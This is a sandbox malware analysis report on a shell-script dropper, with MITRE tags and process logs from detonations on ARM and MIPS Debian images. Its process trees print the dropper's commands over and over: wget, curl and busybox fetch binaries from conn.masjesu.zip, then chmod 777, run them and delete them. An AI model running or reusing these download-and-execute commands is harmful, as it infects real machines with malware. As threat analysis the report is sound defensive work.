Malware Analysis Report

2025-04-03 19:18

Sample ID 241029-dde7gsterm
Target c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
SHA256 c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653

Threat Level: Shows suspicious behavior

The file c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:53

Reported

2024-10-29 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

9s

Command Line

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:53

Reported

2024-10-29 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

84s

Command Line

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N N/A
N/A /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J N/A
N/A /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX N/A
N/A /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg N/A
N/A /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww N/A
N/A /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd N/A
N/A /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh N/A
N/A /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv N/A
N/A /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq N/A
N/A /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z N/A
N/A /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o N/A
N/A /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 N/A
N/A /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq N/A
N/A /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl N/A
N/A /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N N/A
N/A /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J N/A
N/A /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX N/A
N/A /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg N/A
N/A /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww N/A
N/A /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd N/A
N/A /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh N/A
N/A /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv N/A
N/A /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq N/A
N/A /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /usr/bin/curl N/A
File opened for modification /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /usr/bin/curl N/A
File opened for modification /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /usr/bin/curl N/A
File opened for modification /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /usr/bin/curl N/A
File opened for modification /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /usr/bin/curl N/A
File opened for modification /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /usr/bin/curl N/A
File opened for modification /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /usr/bin/curl N/A
File opened for modification /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /usr/bin/curl N/A
File opened for modification /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /usr/bin/curl N/A
File opened for modification /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /usr/bin/curl N/A
File opened for modification /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /usr/bin/curl N/A
File opened for modification /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /usr/bin/curl N/A
File opened for modification /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /usr/bin/curl N/A
File opened for modification /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /usr/bin/curl N/A
File opened for modification /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /usr/bin/curl N/A
File opened for modification /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /usr/bin/curl N/A
File opened for modification /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /usr/bin/curl N/A
File opened for modification /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /usr/bin/curl N/A
File opened for modification /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /usr/bin/curl N/A
File opened for modification /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /usr/bin/curl N/A
File opened for modification /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /usr/bin/curl N/A
File opened for modification /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /usr/bin/curl N/A
File opened for modification /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /usr/bin/curl N/A
File opened for modification /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /usr/bin/curl N/A

Processes

/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/chmod

[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/rm

[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/chmod

[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J

[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/rm

[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/chmod

[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX

[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/rm

[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/chmod

[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg

[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/rm

[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/chmod

[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww

[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/rm

[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/chmod

[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd

[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/rm

[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/chmod

[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh

[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/rm

[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/chmod

[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv

[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/rm

[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/chmod

[chmod 777 mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq

[./mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/rm

[rm mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/chmod

[chmod 777 Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z

[./Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/rm

[rm Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/chmod

[chmod 777 H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o

[./H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/rm

[rm H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/chmod

[chmod 777 MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8

[./MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/rm

[rm MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/chmod

[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq

[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/rm

[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/chmod

[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl

[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/rm

[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/chmod

[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/rm

[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/chmod

[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J

[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/rm

[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/chmod

[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX

[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/rm

[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/chmod

[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg

[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/rm

[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/chmod

[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww

[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/rm

[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/chmod

[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd

[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/rm

[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/wget

